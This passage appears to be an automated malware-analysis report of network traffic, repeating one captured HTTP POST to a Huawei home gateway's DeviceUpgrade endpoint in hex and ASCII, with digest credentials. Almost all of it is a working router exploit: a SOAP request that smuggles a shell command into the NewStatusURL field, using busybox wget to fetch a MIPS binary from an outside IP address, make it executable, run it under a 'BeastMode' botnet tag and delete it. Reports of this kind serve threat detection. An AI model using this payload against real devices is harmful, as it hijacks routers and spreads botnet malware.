52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(busybox wget -g 45.95.168.143 -l /tmp/bigH -r /beastmode/b3astmode.mips;chmod 777 /tmp/bigH;/tmp/bigH BeastMode.Rep.Huawei;rm -rf /tmp/bigH)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 35 2e 39 35 2e 31 36 38 2e 31 34 33 20 2d 6c 20 2f 74 6d 70 2f 62 69 67 48 20 2d 72 20 2f 62 65 61 73 74 6d 6f 64 65 2f 62 33 61 73 74 6d 6f 64 65 2e 6d 69 70 73 3b 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 62 69 67 48 3b 2f 74 6d 70 2f 62 69 67 48 20 42 65 61 73 74 4d 6f 64 65 2e 52 65 70 2e 48 75 61 77 65 69 3b 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 62 69 67 48 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 